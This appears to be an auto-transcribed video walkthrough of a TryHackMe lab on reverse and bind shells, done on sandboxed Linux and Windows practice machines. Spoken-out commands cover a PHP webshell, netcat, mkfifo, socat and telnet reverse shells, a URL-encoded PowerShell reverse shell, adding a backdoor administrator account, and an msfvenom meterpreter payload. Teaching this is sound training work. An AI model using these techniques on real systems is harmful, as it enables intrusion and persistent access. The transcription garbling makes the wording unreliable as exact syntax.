remainder of the payload because remember this is a staged payload and giving us a reverse shell notice that because a multi for/ handler was originally backgrounded we needed to use these sessions one and number one to foreground it again this worked as it was the only session running had there been another sessions active we would have needed to use sessions to see all the active sessions then use session the number for the line to select the appropriate session to foreground this number would have also been displayed in the line where the shell was open see command shell Session One open what command can be used to start a list in the background that's going going to be the DJ command or exploit DJ you can also just use the background command but this is when we're actively exploiting it before we actually run the exploit if we had just received our 10th reverse shell in the current at Med exploit session what would be the command to use to forground it well remember zero is actually the first one that's used for a session so it's actually going to be 0 through nine if we have 10 sessions so we'll go ahead and do sessions nine nice job once again some of that would have been review especially if you've gone through The Interpreter lesson so I appreciate you guys walking through this with me go ahead and jump to the next task here are times when we encounter websites that allow us an opportunity to upload in some way or another an executable file ideally we would use this opportunity to upload code that would activate a reverse or bind shell but sometimes this just isn't possible in these cases we would instead upload a webshell see the upload vulnerabilities room for a more extensive look at this concept webshell is a cc term for a script that runs inside a web server usually in a language such as PHP or ASP which execute code on the server essentially commands are entered into a web page either through a HTML form or directly as arguments in the URL which are then executed by the script with the results returned and written to the page this can be extremely useful if there are firewalls in place or even just a stepping stone into a fully fledged reverse shell or bind shell as PHP is still the most common service ated script in language let's have a look at a simple code example in a very basic oneline format we have the PHP Echo PR shell XX CMD and PR now that may sound like a bun of goly but it is PHP which is the most common server side scripting language this will take a get parameter in the URL and execute it on the system with shell xec essentially what this means is that any commands we enter into the uro after the question mark CMD equal sign will be executed on the system via windows or Linux the pr elements are to sure that the results are formatted correctly on the page let's see this in action and you can see in the example they show the IP address SL uploads for/ shell. PHP Mark CMD equals so anything after that question mark CMD equal sign will be executed on the target system regardless whether it's windows or Linux it's not discriminatory here guys it wants to get that reverse shell on the web notice that when navigating the shell we use a get parameter CMD with the command if config which correctly returned the network information of the Box in other words by entering the if config command used to check the network interfaces on Link's Target into the Ural of our shell it was executed on the system with the results maternal this would work for any other command we chose to use for example who am I host name Arch Etc as mentioned previously there are a variety of web shells available on Cali by default we have the Ford user share webshell directory also the infamous pentest monkey PHP reverse shell a full reverse shell written in PHP note that most generic language specific for example PHP reverse shells are written for Unix based targets such as Linux web server they will not work on Windows by default when the target is Windows it's often easiest to obtain rce using a webshell or by using msf Venom to generate a reverse or bind shell in the language of the server with the former method obtaining a remote code execution is often done with a URL a URL encoded Powershell reverse shell this would be copied into to the URL as the CMD argument here we have a big list which is the argument now this may seem like a fairly big command and it is if you go back to task 8 that was the original command but it's been URL encoded to be used safely in a get parameter thus why you see all the percentage sides remember that the IP and port in the Bold towards the end of the Top Line will still need to be changed in the above code example which was something that also needed to be filled in in the task a code example okay so let's say we have a shell now want we've covered lots of ways to generate send and receive shelves the one thing that all these have in common is that they tend to be unstable and non- interactive even Unix style shells which are easier to stabilize are not ideal so what can we do about this on Linux ideally we would be looking for opportunities to gain access to a user account SSH Keys stored at home user. SSH are often an ideal way to do this in ctfs or capture the flags it's also not infrequent to find credentials lying around somewhere on the box some exploits will also allow you to add your own account in particular something like dirty cow or writable the Shadow or password file would quickly give you SSH access to the machine assuming SSH is open and let's be honest that may be a big assumption it's sometimes possible to find passwords for running services in the registry VNC servers for example frequently leave passwords in the registry stored in plain text some versions of the filezilla FTP server also leave credentials in an XML file at at C program files filezilla server filezilla server.xml or zamp filezilla server files of a server.xml these can be md5 hashes or in plain text depending on the version ideally on Windows you would obtain a shell running as the system user or an administrator account running with high privileges in such a situation it's possible to Simply add your own account in the administrator's group or the machine then log in over RDP tnet Winx PS xcc winr or any number of other methods dependent on the services running on the box the Syntax for this is as follows and keep in mind this is for Windows systems we have the net user username password and then for slad net local group administrators username slad is also another command that you could use to add your own account in the administrator's group to a machine the important takeaway from this task is reverse and buying shells are an essential technique for getting remote code execution on a machine however they will never be as fully featured as a native shell ideally we always want to escalate into using a normal method for accessing the machine as this will invariably be easier to use for further exploitation of the target go ahead and click completed if you literally only do one example just one and you get something from that that's good enough if you get nothing from these lessons and you're just trying to get through these tasks well you're at least exposing yourself to these techniques and Concepts that's a step forward in the right direction especially if you want to be a penetration tester or at least see if you would be interested in being a penetration tester even if you're thinking ah I don't want to be a pen tester at this point well you're going to finish the series because we finished what we started nothing chitchat let's do this all right let's get to the action this room contained a lot of information and gave you little opportunity to actually put it into practice the following two tasks contain virtual machines one abunto 18.04 server and one a Windows Server each configured with a simple web server with which you can upload and activate shell this is a Sandbox environment so there will be no filters to bypass great login credentials and instructions for each will also be given should you wish to log in to practice with netcat socat or Matti shells the remainder of this task will consist of shell examples for you to try out on the practice boxes all right try uploading webshell to the Linux box then use the command NC for netcat the local IP address the port /bin/bash to send a reverse shell back to a waiting listener on your own machine Let's Go and try that now so the first things first if you scroll down to the bottom you'll see that there's a Linux practice box and a Windows practice box so for these questions we're going to use the Linux practice box we'll go ahead and click the blue start ATT attack box button first up at the top this box attached to the task is an auntu server with a file upload page running on a web server so we'll be using this one for web shells this should be used to practice shell uploads on Linux systems equally both socat and netcat are installed on this machine so please please feel free to log in Via SSH on Port 22 to practice with those directly the credentials for logging in are shell and then the password is right there try hack me with uh different letters and characters and once that attack box is up and running go ahead and click the green start machine button for that Linux practice box that will give us a new IP address at the top right there for active machine information now you may be thinking uploading a web showell I don't have a exploit for that well they actually provide that you'll see in the second question they say navigate to user share webshell / PHP and there's a PHP reverse shell right there so we're going to go ahead and go to that specific directory within the Linux system we do a CD into sluser SL share SL web shells SL PHP and then we will do a quick LS and voila we have the exploit right there but we need to do some modifications first we are going to as the question directs us to change the IP address and port to match the T and Z IP with a custom Port uh or we can just leave the port depending on what it is we're then going to set up a netcat listener and then upload and activate that shell and that will answer both question two and one now that we've confirmed it's there let's go to our desktop and copy that exploit to our desktop before we begin any modifications to do that quickly we'll do CD SL root SL desktop that will take us to the desktop directory and as you can see we have our desktop right there now we'll copy that exploits we'll do a CP the path of the exploit currently which is/ user SL share SL webshell SL PHP slash the name of the exploit which is also listed in that second question there PHP D reverse D shell. PHP don't press enter just yet do a space and then we're going to do a DOT indicating that we want that file copied to our current directory which is the desktop press enter and then if we do LS now we'll see that that PHP reverse shell has has been successfully copied to the desktop if you check your desktop you should see it popped up right there and you could use whatever text editor you like here I'm just going to double click and it looks like it opens up in the default pluma application you can also use Sublime Text VI or Nano and we're going to change the IP address not to that IP address that just populated for the Linux shell practice that attack machine IP address it's going to be the one for our box the trackme box so it'll be up at the top of your screen in the top right hand corner this one right here so we'll keep this single quotes in there but we're going to put in the IP address 101035 249 yours going to be different in M make sure you double check that IP address so it's the attack box that we're going to be using for this PHP reverse shell once that is down go ahead and press save and we can close that file now we will set up the netcat listener and upload and activate the shell on the Linux machine and they actually give us the command for this in the first question so these two questions complement each other the netcat local IP address support- e/ bin SL bash to send their R shell back to a Wai and listener on our machine our own machine so now to set up the netcat listener do netcat or NC and then the local IP address so this is going to be the IP address of the attack box not the one that was populated for the Linux machine that was right there it's going to be the one at the top in the upper right hand corner for that attack box the same one that should be seen in the terminal as you can see mine is 101035 249 so we're going to do 10101 135 249 once again that's going to be our attack box IP address cuz we're going to connect back to it for the netcat listener and then we will type in dash lvmp for the options there and then on Port 1 2 3 4 and press enter same important as that script or the exploit for the PHP reverse shell as you can see that is successfully listening on our IP address for the port 1234 so we're ready for that netcat listener now you may not know this but the Linux machine that we activated is actually the vulnerable web server so if we type HTTP coin and then that IP address that was populated right there at the top left hand corner of the screen for the actor machine information M's 101095 52 for the Linux shell practice should pop up with the page at Linux practice webshell right here this a simple page to practice file uploads all files will go to the/ uploads directory no filters are in place so make sure that it does not change to HTT oh my gosh a whole Squadron of planes passing by that is cool and if you get an error make sure that it's not changing to https it's staying at the HTTP SL SL then the IP address of Linux machine so now we're going to perform the file upload so we'll click the browse button which is going to take us to the desktop which is where our reverse shell PHP file is and once it's selected we'll go ahead and click open and submit file has been successfully uploaded nice job and they give us the directory position of that PHP file for slid uploads PHP reverse shell. PHP so you can click on that or type in the whole thing and then it'll take you to that file or you can just do the/ uploads and then that will take you to the uploads page and you can see the Parent Directory the PHP reverse shell has been successfully uploaded now you can see our reverse shell is listening because we clicked on that PHP reverse shell now when you click on that file you may not see anything directly happen but you may see by the index of/ uploads name there's actually a small dot that's moving back and forth that indicates that the shell has started that the connection has been made and if we look at our terminal we'll see that yes the netcat listener has created a session nice job so when you look at the Shell you'll see that it's actually forbin slsh which is shell this first question actually asked for the forbin SL bash shell so slightly different to do that it's pretty simple let's open up a new terminal and we'll start a new net cap list we'll do nc- lvmp but for the port we'll choose a different port uh say 777 and then press enter you can see that we are listing on that Port now you may notice that we did not specify an ipages we just typed in netcat the options and then the port number if we actually look at listening on 0.0.0.0 that just means it's a wild card it can be pretty much any port on this system so that'll work as long as it's using that Port 777 now in the Shell we use that command in the first question which includes the for /bin/bash so we'll do NC then the local IP address which is the same IP address that we've been using thus far the one at the very top in the upper right hand corner there 1010 135 249 yours different mine make sure you double check that not using the uh Linux IP address right there then we will go ahead and do the port which is going to be 777 using a different port indicating a different shell and then we're going to type the- e for execute in SL bin SL bash and press enter as you can see the connection has been received successfully woohoo so there you guys have it we have successfully done not just have one shell we' actually have successfully completed two reverse shells web shells give yourselves a pad on the back we'll go ahead and click complete on that and click completed on that second one and we'll go to the next question log into the Linux machine over SSH using the credentials and task 14 use the techniques in task 8 to experiment with bind and reverse netcat shell all right this should be fun we'll go ahead and and basically just SSH into it so we have the credentials right here go ahead and clear out of that you can press contrl C or command C if you're on the Mac and go ahead and SSH the name of the user which is going to be Shell at the IP address and that IP address is going to be at the top the popular Linux IP address for that attack Target 101095 52 make sure you have the dot in there then press enter we'll say yes connect and then we will type in the password the password is right at the bottom in task 14 capital t r y capital H the number four lowercase c k uppercase M the number three press enter and remember to have the exclamation mark at the end all right success you should be greeted by the shell practice prompt so now let's go back to task eight common shell payloads and they said just to use the techniques here for bind and reverse shells so they're being pretty veck and if we look at task a we can actually see that we've already run this command net cat- lvmp report d e/ bash now we already use this command netcat lvmp Port number- ebin bash to create that bind shell on the target the web shell so you could already move on to the next question if you wanted to we're going to try one more method which is actually creating a pipe so we'll take this command the make fifo Command we'll go to our handy dandy clipboard copied into the clipboard and once we've SSH into the system we'll paste it in there it is and there's actually one thing that will change which is the Port as you can see it's just the brackets and then Port we'll take out the brackets make sure that the data flows correctly uh if we don't take out the brackets then um data won't float correctly and the web shell will not work go ahead and type in the port number which is going to be 8080 you can use whatever port number you'd like I'm going to use 8080 so we'll take out the brackets with the port but we'll keep the bracket in between the port and that sltf directory the rest of the command that way the data will FL properly and then we'll go ahead and press enter listen on any IP address on that port 8080 that's good sign okay so it's listening and this is the listener nc- l l for listening we're going to go into the other terminal clear that out and we can use the up Arrow to use the previous command netcat but we're going to make sure we're using the IP address of that Linux box so that's the same IP address over here instead of our attack box that's going to be the one in the upper leand corner the one that was popul for the Linux box because this SSH session is the Linux machine as you can see that's the same IP address as the session so we're connecting to it from our attack box so we'll change that from 101035 249 to 101095 52 we'll go ahead and get rid of the options and the port so we have netcat the IP address and then we're actually going to have no options and then the port is going to be 8080 press enter and you'll see that automatically the shell SSH session pops up with an unknown IP address we have a successful piped shell congratulations guys not that intuitive or easy I should say but it is just a different method to create a reverse shell a web shell uh using netcat now you may be confused you're saying Brock I don't see anything happening it's just blinking on the screen does that really mean I mean it's not connected right I don't have a reverse sh well yes you do if you actually type LS you'll see see well nothing happens well that's because you have to type who am I you'll see that the user actually is shell which means that we do have that reverse shell so it's a little confusing so after performing that netcat connection we transfer to the Shell directory within the Linux box if you type CD do dot to go up a directory and then type LS you'll see that Shell director if we type CD dot dot again and then do an LS you'll see all of these directories which means that there's actually a lot more on this machine than the default shell directory so you can see when we created that netcat session we were not the root user for the attack box we were the shell user for the Linux box and you can see all the files and directories right there so we did successfully create a reverse webshell using the pipe method there's different methods to use such as the socat method which we'll tackle next you can click completed on that practice reverse and bind shells using socat on the Linux machine try both the normal and special techniques so we'll control C to stop that piped reverse shell and we will go to use socat Tas six and we'll use some examples from here so we'll go ahead and steal this command from the reverse shell section right at the bottom socat TCP the local IP the local Port exec bash DLI it's the one right before the bind shells section for task 6 socat and then we'll go ahead and copy that in the clipboard and paste that into our SSH oh I pasted that in it actually went ahead and ran contrl C to copy from the clipboard and then we will go ahead and close the clipboard crl V we paste that in we don't want to run it just yet we have to change the IP address that's the local IP address so this is going to be what it's connecting back to and that's going to be our attack box IP address so the IP address up there at the top we'll take out the brackets and put 1010 135 249 once again that's going to be that IP address at the top upper right hand corner of that tack boox screen and then we will change the port we'll use port 1 2 3 4 can use whatever Port you'd like and then we'll keep the XX bash DLI so if we execute this command it will connect to our listener but we haven't set up the listener yet let's go ahead and do that now so we'll switch to our other terminal what I extended the okay so it looks like we got that error message saying that the time was up for the machine but uh looks like everything is still running so I'm just going to go with it and we'll go ahead and contrl C stop that netcat session we'll clear that out and to start the list on our attack box that's actually going to be the first command they give us right there in the reverse shells section of task six socat TCP DL colon and then the port with the space tack at the end so we'll go ahead and type that out socat TCP DL colon and then the port which was Port 1 2 3 4 and then a space and attack and press enter so now the cursor is just a solid white it may seem like nothing's happened let's go ahead and execute the socat reverse shell connection from the SSH Linux box press enter on that command flip back over to this one now may not look like anything's happening but the cursor is blinking indicating that a reverse shell connection has been established if you do happen to have problems go ahead and change the port from 1 2 3 4 or any previous Port that you used and try a new Port if you use a new Port like 443 https track me won't get bogged down or confused by any previous ports or IP addresses that you have used in this lesson so that it will solve that dilemma the way to tell if the shell is working properly is to run a command so type in LS and you'll see LS on that Linux box on the SSH session pop up if we type in who am I the shell user pops up and any commands that we type in and press enter on within this socat TCP session they're actually being directly run on that Linux box on that SSH session so in the same question they say to do a RSE shell and a bind shell using socat we have done the reverse shell which is just the target machine connecting back to the attacking box machine a bind shell is just the opposite so let's start the listener on the attacking box press contrl C to stop that reverse shell TCP socat session and we'll go to the socat task six to look at the syntax right after the reverse shells is the bind shells syntax and we'll copy that First Command socat TCP DL the port XX B- Li we'll go ahead and paste that in there and make sure you're using the commands for the Linux system this is not windows so we'll change the port in this case to 443 which will represent an http s bind shell then we will press enter and it looks like it did successfully start that socat listener so now we'll connect back to it from the Target and I know it sounds like a reverse shell cuz we're connecting back to but this is actually just we're connecting to the socat listener this could have been something that was created days or even weeks in advance to us gaining access to this target system uh but because of course we're in a sandbox environment this is all set up to work pretty instantly so we're able to just create that socat listener and then use the target to type the second command which is regardless of whether it's windows or Linux we will use this command socat TCP colon and it seems to have pasted my last copied item so we'll get rid of that at the end there with the bash DLI and we will leave the socat TCP colon the target IP not the local IP it's the target IP which in this case will be our attack box IP address that one up at the top there 101035 249 and then the Target Port which is going to be the one that we specified in the socat command which was 443 so we'll do 443 then don't press enter just yet do a space and then make sure the TAC is there at the end and press enter and if we look back on our tack box it seemed to have aired out but let's check this out to an LS and you can see we have the files listed in that directory what directory in let's run a PWD the root desktop H and you can see those commands being run directly on your machine pretty cool right so now you can kind of see the difference between reverse shells and bind shells it's basically the same thing it's just where the shell is coming from um but still always going to have a listener and a connection and that's what makes it a shell so you can click complete on that nice demonstration of your skills look through payload all the things and try some of the other reverse shell techniques try to them and see why they even work okay so we have to do a little reading so if you actually click on that link it will open a new tab and we can see that we're directed to the GitHub repository payload all the things which is located in the ssky repo and you can see that there's a number of modules here if you scroll down on the payloads all the things page you'll see some different examples of reverse shells you'll see the net cat shells these are shells that we have used throughout this lesson you'll also see the pH HP shell examples this is when we use the web shell or the reverse shell since this is a Linux system we cannot use the power shelf reverse Shell let's try the tel net example in the attacker machine we start two listeners using the netcat command- lvp and then two different ports 8080 and they use 8081 now our attack box we run that command nc- lvp you might as well do lvmp the full options available and then we'll do port 8080 press enter open up another another terminal Tab and we'll do the same command net cat- lvmp but we will do a different Port Port 8081 press enter now we have two netcat listeners but it's the same attack box using different ports that prompt appears on the desktop it's listening on any IP addresses with Port 881 for some reason on the other tab The Prompt didn't appear but it is also listening but just on a different port 8080 if we look back at the payloads all the things page we'll see that the victim machine command is as follows so the next step is to run this command on the victim machine the SSH session for that Linux box so we'll go ahead and copy that go ahead and clear that out paste that in and the command will start right at tell net and then we'll put in the IP address of the attack box that we will be connecting back to over telet that is going to be the one at the very top there so 1010 9799 my IP address did change because I had to restart my attack box so there's a new IP address and then we have 880 we do the pipe forbin slsh you can also do a bash Shell by changing the sh Tobin SL bash if you would like to and then we'll do a another pipe we're piping multiple commands into this one telnet command tnet and then your IP so this is going to be the same IP address get rid of those brackets 10109 9799 and 8081 so basically we're creating two reverse shells in just one command pretty cool right it's a one line so we get and press enter and you should see that it is connected to that IP address the attack boox IP address and if you look on that listing machine you'll see bam we have a reverse Shell through telnet and we also have a reverse shell on Port 8081 so 880 and 81 boom two burds one stone so now if we type LS from the shell practice you'll see it pops up on that first port 8080 shell if you do a print working directory you'll see that it also pops up as you can see it works because netcat is installed on both machines just like socat must be installed on both machines in order for this reverse shell to work go ahead and click completed on that and we can go ahead and cross off that Linux practice box task 14 because that is all the questions for the Linux box now will not be that easy in real life this is a sandboxed environment these things are set up for us there's really no regulations no firewalls all the ports are open so it's pretty much a piece of cake yes there will be websites that allow you to upload files but there will certainly be rules in place in order to detect malicious files so that payloads aren't executed in addition to that there's also safeguards not only at the firewall level that close off Port so you might have trouble finding an open port that will actually work there are also protections at the level to detect malicious files being run and reverse shells or bind shells actually occurring nonetheless reverse and bind shelves are a good topic to learn as a penetration tester so let's check out the window side of things we already checked the Linux side switch to the windows VM try uploading and activating the PHP Das reverse shell does this work so now it's actually a good time to terminate your current attack box machine instead of extending this will give you more time if we start a brand new attack box so we'll click the blue start attack box but once that has been terminated we'll go ahead and terminate the Linux attack machine and scroll down to task 15 go ahead and wait until that attack box initializes then click the green start machine button this task contains a Windows 2019 server box running on a zamp web server this can be used to practice shell uploads on windows again both socat and netcat are installed so feel free to log in over RDP or winrm to practice with these credentials are the administrator and then that same password for the Linux box and then they also give us the example command to log in using RDP and since our attack box has initialized we'll go ahead and click the green start machine button to start that Windows practice box so once that IP address is populated we'll go ahead and copy it paste it into a web browser and we'll see that it opens up a new vulnerable web page it looks like we can upload a malicious file similar to the Linux box now in the Linux box the PHP reverse shell is located in the user share web shells PHP directory let's go ahead and check that on the window Windows box to see if it's there we'll go ahead and do a cd/ user SL share SL webshell SL PHP and then press enter Then do an LS and we can see that we do have that PHP reverse shell. PHP of course this file is going to be for the Windows page or the windows vulnerable web page so let's go back to the desktop we'll do CD the squiggly line SL desktop press enter and then if we do an LS we will see that we are successfully transferred to the desktop and then we'll do a copy to copy that file SL user share SL webshell PHP slth name of that file for the PHP reverse shell it's going to be PHP D reverse D shell. PHP do a space and then do a DOT to indicate we want that file copied to the desktop press enter and now if we check our desktop we'll see that the file successfully copied to the desktop now we'll go into that file and we will change the IP to our attack boox IP the one at the top right there 1010 25.75 and we'll keep the port 1 2 3 4 go ahead and save that now we'll exit once that's saved we'll go back to the browser and upload that file from our desktop so we'll click that click upload and submit and the file has been successfully submitted we can do a for slash uploads and we'll see in that directory the PHP reverse shell file has been successful uploaded so after that file is upload we'll go ahead and activate it to see if it's actually going to create a reverse shell we'll create a netcat listener by using nc- lvmp and use that same port that was in the file that you changed it to we'll do 1 2 3 4 then back on the index we'll go ahead and click that file within the uploads so it looks like a shell was not created so we're going to go ahead and click completed on that upload a web shell on the Windows Target and try to obtain a reverse shell using Powershell so this represents a realistic scenario you up upload a malicious file it doesn't recognize it when you try to run and there may be precautions or rule sets in place to make sure that malicious files are not run now if we go back to task 11 webshell we're going to replicate this web browser action to create a reverse shell using the browser tab or the browser search bar right after uploads forward slash we will type in the name of that file that we uploaded to the server and that is going to be right there in the uploads directory so it's going to be PHP D reverse D shell. PHP it's the same name as the file I didn't change it and then after that we do simply SL shell. PHP so once we've called out where that file is in the directory we do a question mark CMD equals and remember whatever we type after the question mark CMD equals will be executed on the machine so now we'll use that big command that they actually URL encoded so we don't have to worry about enod coding we'll copy that whole thing and this will give us a Powers shell reverse shell pretty cool right so we'll copy that long command paste it into the clipboard and they've done all the hard work for us we just need to change the port and the IP address so right where the brackets are in the upper right hand corner of the clipboard we will delete that port in the two brackets and then we'll type in the port of your choice I'll use port 1 1234 and then the IP address is right to the left of that after some percent es and numbers and we will take out the brackets as well and type in the IP address of that attack box so that's going to be at the very top of your attack box right there 1010 25.75 for me and once we have that there's nothing else we need to change so we'll copy then right after the equal sign we'll go ahead and contrl V CMD equals we're going to pass that argument to be executed on the machine so we'll pass that crl + V paste it in and before we press enter cuz that is is going to go to a listener that's not yet set up so we need to create the listener back in the terminal we'll go ahead and do a nc- lvmp and create a listener on Port 1 2 3 4 or the port of choice that you selected press enter now that that's listening we'll go ahead and execute that command through the browser and as we can see if we go to the terminal the cursor is blinking so we'll go ahead and type LS looks like nothing happened directly do a print working directory so went back back I checked the PHP reverse shell file and it seems that there was a small error I left the p in so I'm going to take that out and the IP address is right there we'll save that and we will re-upload that to the windows web server so we'll actually rename this file to PHP D reverse D shell 2 because this is the second PHP file that we've done and then we will go back to the browser and upload the PHP D reverse shell to file submit that and if we go to the uploads directory it should show up alongside the first one that we uploaded and sure enough there it is let's go ahead and see if it does work if we do have a listener so we currently have a listener nc- lvmp using Port 1 2 3 4 we'll click it to see if it does execute just by merely clicking it and activating it seems that it's still was problematic and there was no web shell created oh look at that so it seems like it did crate but just for a short amount of time barely any time and then it just exited because the uname command tried to be run let me go ahead and try that again just to make sure and I'm going to keep my terminal open this time keep it like that so we can see it press enter and we can see that for brief milliseconds it was connected but it was not a stable connection at all uname canand was not recognized so it's not saved in the clipboard so once you have uploaded the correct PHP reverse shell file go ahead and copy that long command from task 11 web shells paste it into the clipboard and we're going to go ahead and change that IP address in Port so this is going to be IP take out the brackets as well 10.10 25.75 and the port is going to be 1 2 3 4 and we're going to copy that command whole thing and right after PHP D reverse d shell 2. PHP right after the name of the file we're going to do a question mark a question mark CMD equals and then whatever we put after this is going to be executed by the machine so we put that in paste that in and make sure that you have your listener running now we press enter on that command and it looks like it successfully executed once again it did create a connection but it was short liveed for some reason now to confirm this I actually went ahead and shut off the attack box I shut off the machine and I actually shut down everything I fold the steps in trct me and sure enough the same thing happened it was a brief shell that did connect so we can confirm that there was a reverse shell that was using Powershell through this web server so we'll go ahead and click completed on that we certainly got our practice in now let's move to the next question once again don't get hung up if something doesn't go exactly right this is just a practice session so feel free to learn and run these ever you want so do not feel bad if it doesn't go perfectly remember this is tryck me there's all sorts of wonky stuff that happens and things that are certainly not on our part they even say in the question and try to obtain a reverse shell using Powershell so just the fact that you put in effort is the real value of this question the web server is running with system privileges create a new user and add it to the administrator's group then login over RDP or winrm okay so they actually gave us a instructions for this if we go to the windows practice box we'll go ahead and log in this machine go ahead and copy that command into the clipboard we'll copy it from the clipboard and paste that into the terminal and press enter we'll type y for yes this will log us into that Windows 2019 server box if you hover to the right you can see that we can still access the terminal from which we can run commands Windows Powershell commands so we'll actually go to task 12 next steps and they show us the Syntax for creating users with administrative privileges so we have the syntax net user the username we'll type in BHS as the username and the password will be BHS space slad and then press enter we'll now do the second command net local group administrators the username for slad so we'll do net local group administrators BHS the account we just created and then slad press enter and they have successfully been added to the administrator's list to check that this was done correctly let's go ahead and open up a new terminal from our T box from try hack me then we'll paste that same command for RDP but we're going to change the username to the user that we just created it's going to be you col BHS for me yours is going to be different and then the password is going to be in single quotes we going to change that to BHS and press enter if it connects successfully then it looks like the user was created it looks like the credentials fail but it seems that it was not successful let's go back to the Windows desktop with the actual free RDP if you use control and two fingers to zoom out you can see that we have the taskar there it's just a little hidden and you can click that start button or you can click the magnifying glass and we will search for command prompt or just type in CMD and press enter and as you can see we are here at the command prop so we should be able to use these net user and net local group commands from the command prompt so we'll go ahead and use the first one net user the username BHS password BHS slad press enter and completed successfully that's a better sign than what we received in that RDP desktop terminal from the attack box and what happened was when that command completed successfully it created that RDP session with the windows box any commands that we put after that are not going to be read because it's focusing now on that RDP session so we can minimize those and we will add that new user to the administrator's group how do we do that we do net local group administrators which is the name of the group space the username and then for SL add press enter the command completed successfully nice job guys now we can go back to the terminal and we're going to try that command again from the task 15 with the username of the user we created and the password of the password that we set press enter and and it looks like it successfully completed because we did see that username pop up and it looks like it's opening up a new window for us all right so we can go and cross that one off now experiment using socat and netcat to obtain reverse and bind shells on the Windows Target so this is pretty much what we've already done if you go back to the socat examples we can see the examples are all right here we'll switch to our attack boox terminal we go ahead and cancel the session that is not being used to connect to the RP key session and we'll create our listener using TCP so we'll do that command socat TCP DL colon and then the port we'll do Port 1 2 3 4 space Tac press enter so now that that's listening we'll switch it back over to the Windows machine and we'll pull up that command prompt again and now we will use this command to connect back to that listenting session we'll do socat TCP coin the local IP address that's going to be the IP address that we used from the attack box to start that listener so it's going to be the one up there 1010 90.2 in other words not this Windows machine IP address and then we'll do a con the port so we set that to 1 2 3 4 yours may be different make sure you're putting the port that you chose and then we do a space xec colon powershell.exe comma pipes and press enter ah so hat is not used within command prompt it's not installed so this isn't going to work now in theory this would work if socat or netcat was installed on this Windows system another route that could be taken is the one that was used in task 11 to URL en code an argument that will then be executed by the Windows server that was this long command here all we would need to do is take that socat or netcat command URL encode it and right after the question mark CMD equals put that command executed by the Windows Server I'll alternatively if the reverse shell that we created using powers shell had remained open we can also run that command through there but as we know that session didn't last long so let's go ahead and try netcat so we'll do net cat- lvmp and we'll use port one two 3 4 now if we go back to the payload all the things page you'll remember that they actually have a section specifically for netcat and not only netc cap but they have a section for Powershell which we can use on this Windows system so we'll go ahead and copy this first one it looks like we have to change the IP address and Port they have a little area for that so go ahead and change this IP address to the IP address that we will connect to which is the attack box IP address up there so that'll be 1010 90.2 and then the port is going to be 1 2 3 4 and let's try this with the quotations I don't know if those will be needed but we'll just go ahead and try it with it then in Powershell we'll paste that in and it looks like that Powershell command was unsuccessful but you get the point that you can use the payloads all the things repository to look for different exploits that you may actually be able to use okay the next question is create a 64-bit Windows meterpreter shell using msf Venom and upload it to the windows Target activate the shell and catch it with the multi- Handler experiment with the features of this shell okay let's check out the msf Venom task which has examples and we can see the full Command right there Venom dasp Windows where the reverse TCP file is located what type of file it's going to be the listening host and listing Port so let's just use that command make sure attack box is started if it's not started yet and once that attack box is started go ahead and click the green start machine button for the windows practice box so if you still have that RDP session from the previous question you can go ahead and close out of that and in the terminal of the windows practice box we'll go ahead and type msf Venom and the rest of this Command right here to generate a Windows x64 reverse shell in an exe format that we can upload to the Target so the full command is going to be msf Venom DP for payload then where's the payload located they tell us right there it's located in the windows SL x64 SL shell directory so we'll go ahead and do windows SL x64 SL shell SL the name of the file which is reverse TCP it's going to be a file with the exe format it's going to be an executable then Dash the output file location and that's just going to be in the current directory and we will name it shell. EXE the lhost is going to be equal to our IP address up there at the top that's going to be the attack box so 10 do10 yours is going to be different than mine make sure putting the correct one right there at the top then we have an L port and the L Port we will do 1 2 3 4 and press enter Aha and that might take a minute or two but that Windows x64 reverse shell file executable has been created with a file size of 7,168 bytes we'll do a quick PWD to see where that file was located and it was located in the for/ root directory so if we click on the roots home we'll see it right there the file will be saved by default in whatever directory you were currently in when you created that file so this one's right in the root home and you can see it right there so now we need to upload it to that vulnerable windows web server so pull up the browser and we'll type in that HTTP so we can type in that IP address that was populated for the windows shell it's going to be right over there in the top left hand corner we'll do http co/ 1010 18810 here always going to be different press enter and you'll see we have hit that file uploads page we'll browse so hit the browse button and we'll go to home and we'll see that shell. exe this is the roots home directory and we can click open and submit all right file successfully uploaded so we've created the msf Venom Windows x64 reverse shell file executable we uploaded that to the windows vulnerable web shell now how are we going to actually create that connection well we need a listener for that executable to connect back to once we activate it so you can activate it now but it's not going to do anything so on our attack box we need to go back to the terminal and type msf console this will start msf console from which we can run the meterpreter session through metas sploit so the first step was creating that executable file uploading it now the second step is going to be using the multi- Handler within interpreter so we type in use multi SL Handler and press enter and it looks like it gave us the generic shell reverse TCP that's the exact same shell that we're going to be using for this type of attack a TCP reverse shell so we're going to go ahead and do a show options to see if there's anything that we need to set looks like the L host and the L Port need to be set and there's not really many other options besides that so we'll set the lhost to the attack box IP address so it's going to be 101028 the same IP address that we set that exq file to connect back to so that's going to be our attack box we'll set the L Port you can also do set G if you wanted to set it globally and we'll set that L port to the same port that we specified in the executable file for Windows reverse shell which is 1 2 3 4 now that that's been set we'll go ahead and run that so if we try to act activate that shell on the vulnerable web server you'll see okay it downloads the shell. exe file if we click that double click it try to run it go back to the terminal and you can see that the reverse shell has actually started now you could alternatively have gone actually to that Windows VM so if we wanted to you could open up another terminal and let's go ahead and background this shell we can use the background command and if we go to the task 15 windows practice box it has that command in there to actually remote desktop into that VM so we'll go ahead and copy that and paste it into the clipboard and we'll copy it from the clipboard and we'll paste it into the terminal and it should automatically log Us in we'll click yes it has those credentials in there so I'm going to be logging in as the administrator you can also log in as the user that we created in the previous question that we added to that administrator's group you can now go to Firefox and we'll do the same thing we'll go to that vulnerable web server web page may take a second so that's just going to be RP address I was given for the windows shell practice it's over there in the top leftand corner do HTTP on10 do10 do1 18810 and press enter okay we're here now if we go to the for uploads directory you'll see that the shell. exe file has been uploaded regardless of what machine you're using to access the internet on and we'll double click that we'll save that file seems like it aired out but when I click the file explore little folder icon it's right there downloaded so we'll double click that to execute it now this is one of the things I was talking about the OS level the operating system will actually catch malicious files like executables so it will ask us often times it won't even ask you it just say Windows Defender has neutralized this malicious file is not going to run that no chance but we're going to go ahead and run that this is a Sandbox environment so this is representing an older system in fact this is a Windows 2019 server box using running a zamp web server so it's a little bit outdated and of course the longer that you have a system without operating system updates the more viable it's going to be the more susceptible it's going to be two malicious attacks and it looks like nothing has happened but if we go back to our terminal we will see that the command shell session two has closed interesting it looks like there's just popping out a bunch of command shell sessions that are closing for some reason I only activated it on the Windows side of things and also on the Linux side of things or attack box side of things and that may be the result of an unstable internet connection maybe it's a dropping it's trying to connect and then it's dropping again and it creates kind of a cycle so we're going to go ahead and contrl c and stop this 